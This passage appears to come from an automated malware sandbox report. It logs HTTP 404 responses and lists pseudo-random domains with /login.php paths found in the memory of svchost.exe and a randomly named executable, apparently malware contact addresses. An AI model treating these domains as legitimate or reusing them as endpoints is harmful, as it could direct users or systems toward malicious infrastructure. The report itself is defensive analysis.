Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 11 Nov 2024 17:07:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close vary: Accept-Encoding expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/" cf-cache-status: DYNAMIC NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare alt-svc: h3=":443"; ma=86400
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 11 Nov 2024 17:07:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close vary: Accept-Encoding expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/" cf-cache-status: DYNAMIC NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare alt-svc: h3=":443"; ma=86400
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 11 Nov 2024 17:07:45 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close vary: Accept-Encoding expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/" server-timing: amp_sanitizer;dur="34.7",amp_style_sanitizer;dur="16.4",amp_tag_and_attribute_sanitizer;dur="13.0",amp_optimizer;dur="16.1" cf-cache-status: DYNAMIC NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare alt-svc: h3=":443"; ma=86400
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 11 Nov 2024 17:07:47 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close vary: Accept-Encoding expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/" server-timing: amp_sanitizer;dur="48.4",amp_style_sanitizer;dur="20.0",amp_tag_and_attribute_sanitizer;dur="22.4",amp_optimizer;dur="24.5" cf-cache-status: DYNAMIC NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare alt-svc: h3=":443"; ma=86400
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 11 Nov 2024 17:08:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close vary: Accept-Encoding expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/" cf-cache-status: DYNAMIC NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare alt-svc: h3=":443"; ma=86400
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 11 Nov 2024 17:08:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close vary: Accept-Encoding expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/" cf-cache-status: DYNAMIC NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare alt-svc: h3=":443"; ma=86400
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 11 Nov 2024 17:08:06 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close vary: Accept-Encoding expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/" server-timing: amp_sanitizer;dur="42.0",amp_style_sanitizer;dur="15.7",amp_tag_and_attribute_sanitizer;dur="21.7",amp_optimizer;dur="20.5" cf-cache-status: DYNAMIC NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare alt-svc: h3=":443"; ma=86400
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 11 Nov 2024 17:08:09 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close vary: Accept-Encoding expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/" server-timing: amp_sanitizer;dur="45.3",amp_style_sanitizer;dur="25.7",amp_tag_and_attribute_sanitizer;dur="15.3",amp_optimizer;dur="20.1" cf-cache-status: DYNAMIC NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare alt-svc: h3=":443"; ma=86400
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Mon, 11 Nov 2024 17:07:33 GMT Content-Length: 1245
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Mon, 11 Nov 2024 17:07:38 GMT Content-Type: text/html Content-Length: 580 Connection: keep-alive
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Mon, 11 Nov 2024 17:07:39 GMT Content-Type: text/html Content-Length: 580 Connection: keep-alive
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Mon, 11 Nov 2024 17:07:40 GMT Content-Type: text/html Content-Length: 548 Connection: keep-alive
Source: global traffic. HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx; Date: Mon, 11 Nov 2024 17:07:40 GMT; Content-Type: text/html; Content-Length: 548; Connection: keep-alive
Source: global traffic. HTTP traffic detected: HTTP/1.1 404 Not Found; Server: openresty/1.21.4.3; Date: Mon, 11 Nov 2024 17:07:44 GMT; Content-Type: text/html; Content-Length: 561; Connection: keep-alive
Source: global traffic. HTTP traffic detected: HTTP/1.1 404 Not Found; Server: openresty/1.21.4.3; Date: Mon, 11 Nov 2024 17:07:44 GMT; Content-Type: text/html; Content-Length: 561; Connection: keep-alive
Source: global traffic. HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx; Date: Mon, 11 Nov 2024 17:07:48 GMT; Content-Type: text/html; Content-Length: 138; Connection: keep-alive; ETag: "663ee226-8a"
Source: global traffic. HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx; Date: Mon, 11 Nov 2024 17:07:49 GMT; Content-Type: text/html; Content-Length: 138; Connection: keep-alive; ETag: "663ee226-8a"
Source: global traffic. HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx/1.14.0 (Ubuntu); Date: Mon, 11 Nov 2024 17:07:59 GMT; Content-Type: text/html; Content-Length: 580; Connection: keep-alive
Source: global traffic. HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx/1.14.0 (Ubuntu); Date: Mon, 11 Nov 2024 17:08:00 GMT; Content-Type: text/html; Content-Length: 580; Connection: keep-alive
Source: global traffic. HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx; Date: Mon, 11 Nov 2024 17:08:00 GMT; Content-Type: text/html; Content-Length: 548; Connection: keep-alive
Source: global traffic. HTTP traffic detected: HTTP/1.1 404 Not Found; Content-Type: text/html; Server: Microsoft-IIS/7.5; X-Powered-By: ASP.NET; Date: Mon, 11 Nov 2024 17:07:54 GMT; Content-Length: 1245
Source: global traffic. HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx; Date: Mon, 11 Nov 2024 17:08:00 GMT; Content-Type: text/html; Content-Length: 548; Connection: keep-alive
Source: global traffic. HTTP traffic detected: HTTP/1.1 404 Not Found; Content-Type: text/html; Server: Microsoft-IIS/7.5; X-Powered-By: ASP.NET; Date: Mon, 11 Nov 2024 17:07:55 GMT; Content-Length: 1245
Source: global traffic. HTTP traffic detected: HTTP/1.1 404 Not Found; Server: openresty/1.21.4.3; Date: Mon, 11 Nov 2024 17:08:05 GMT; Content-Type: text/html; Content-Length: 561; Connection: keep-alive
Source: global traffic. HTTP traffic detected: HTTP/1.1 404 Not Found; Server: openresty/1.21.4.3; Date: Mon, 11 Nov 2024 17:08:05 GMT; Content-Type: text/html; Content-Length: 561; Connection: keep-alive
Source: global traffic. HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx; Date: Mon, 11 Nov 2024 17:08:09 GMT; Content-Type: text/html; Content-Length: 138; Connection: keep-alive; ETag: "663ee226-8a"
Source: global traffic. HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx; Date: Mon, 11 Nov 2024 17:08:09 GMT; Content-Type: text/html; Content-Length: 138; Connection: keep-alive; ETag: "663ee226-8a"
Source: global traffic. HTTP traffic detected: HTTP/1.1 404 Not Found; Content-Type: text/html; Server: Microsoft-IIS/7.5; X-Powered-By: ASP.NET; Date: Mon, 11 Nov 2024 17:08:20 GMT; Content-Length: 1245
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx/1.14.0 (Ubuntu)
Date: Mon, 11 Nov 2024 17:08:25 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 11 Nov 2024 17:08:26 GMT
Content-Type: text/html
Content-Length: 548
Connection: keep-alive
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 11 Nov 2024 17:08:21 GMT
Content-Length: 1245
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 11 Nov 2024 17:08:27 GMT
Content-Type: text/html
Content-Length: 548
Connection: keep-alive
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx/1.14.0 (Ubuntu)
Date: Mon, 11 Nov 2024 17:08:29 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx/1.14.0 (Ubuntu)
Date: Mon, 11 Nov 2024 17:08:30 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 11 Nov 2024 17:08:30 GMT
Content-Type: text/html
Content-Length: 548
Connection: keep-alive
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 11 Nov 2024 17:08:25 GMT
Content-Length: 1245
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 11 Nov 2024 17:08:28 GMT
Content-Length: 1245
Source: svchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2044639986.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2045768203.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2051969437.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadyhoh.com/login.php
Source: svchost.exe, 00000002.00000003.1533904520.0000000008AA0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532709108.0000000008AA0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533224308.0000000008AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadyhyw.com/H
Source: svchost.exe, 00000002.00000003.1533224308.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533904520.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1534594675.0000000002F1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1534351748.0000000008AF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532709108.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742183929.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadyhyw.com/login.php
Source: svchost.exe, 00000002.00000003.1725832517.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1722529774.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1516145875.0000000002FAC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1724383433.0000000008B7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadykos.com/login.php
Source: svchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2044639986.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2045768203.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2051969437.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2048442631.000000000089D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadyqaw.com/login.php
Source: svchost.exe, 00000002.00000003.1725832517.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1722340000.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1722529774.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1516145875.0000000002FAC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1515562261.0000000008A25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1724383433.0000000008B7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadyrab.com/login.php
Source: svchost.exe, 00000002.00000003.1437455290.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1432764888.0000000008B0F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1664665430.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433688306.0000000008B16000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1661335994.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1432912644.0000000008B12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1664583329.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433691652.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1432910805.0000000008B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadyveb.com/login.php
Source: svchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1595141664.000000000089D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadyvez.com/login.php
Source: svchost.exe, 00000002.00000003.1859997516.0000000002FAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyces.com/
Source: svchost.exe, 00000002.00000003.2481161521.0000000008A6E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2623816509.0000000008A6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahycuz.com/P
Source: svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1610082181.0000000008B24000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2623273895.0000000008A15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2623952843.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1828997616.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1710718578.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1761273136.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2142459408.0000000002F1D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1617654306.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1613723889.0000000008B28000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1664583329.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1929371959.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1617460331.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1724324245.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2139975711.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1606037853.0000000008B24000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2615554415.0000000002F1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahycuz.com/login.php
Source: svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2616565446.0000000002F67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2127985207.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahydos.com/login.php
Source: svchost.exe, 00000002.00000003.1545295076.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1544887919.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1540174228.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1545631030.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1539305897.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyfow.com/login.php
Source: svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1875058594.0000000008AFD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1809959193.0000000002F36000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1616326624.0000000002F36000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1616788232.0000000008AFD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2114095830.0000000008AFD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2615869717.0000000002F36000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1726674244.0000000008AFD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2120851467.0000000008AFD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1961054788.0000000002F36000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2625560575.0000000008B0D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2140464898.0000000002F36000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1906951398.0000000002F36000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2481952075.0000000008B0B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2078683506.0000000002F36000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1855533253.0000000002F36000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2481301734.0000000008B05000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1596880550.0000000008AFD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1664741807.0000000008AFD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 
00000002.00000003.1826452671.0000000008AFD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1598705927.0000000008AFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyfyh.com/login.php
Source: svchost.exe, 00000002.00000003.1411284154.0000000002F30000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1389905582.0000000002F2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1398889541.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1615937487.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1402185075.0000000002F2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1617654306.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1411345133.0000000002F34000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.2052149448.0000000008E50000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.1841589649.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000002.1841991306.0000000001574000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000002.2054776037.00000000093A0000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.2073814977.000000000936A000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000002.1795928621.000000000088C000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000002.1919088226.0000000008414000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000013.00000002.1934543116.00000000089D0000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000016.00000002.1826196829.0000000000CCD000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000016.00000002.2033815046.000000000881B000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 
00000018.00000002.1833090885.0000000001375000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001A.00000002.1914326367.000000000077D000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001A.00000002.1914326367.0000000000717000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001A.00000002.2109919252.00000000086FA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://gahyhob.com/login.php
Source: svchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahykeb.com/H
Source: svchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2044639986.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2045768203.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahykeb.com/login.php
Source: svchost.exe, 00000002.00000003.1533224308.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533904520.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1534594675.0000000002F1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742184996.0000000008B73000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532709108.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742183929.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1768332596.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1763387928.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533888500.0000000008AFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahykih.com/login.php
Source: svchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2110053905.000000000D64A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1595141664.000000000089D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahynuw.com/login.php
Source: svchost.exe, 00000002.00000003.1411284154.0000000002F30000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937479340.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1617691262.0000000002FE6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1911552556.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2044639986.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1830571345.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1861091241.0000000008B72000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742184996.0000000008B73000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1615937487.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1702355410.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1664665430.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1722529774.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1402185075.0000000002F2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1617654306.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1724383433.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 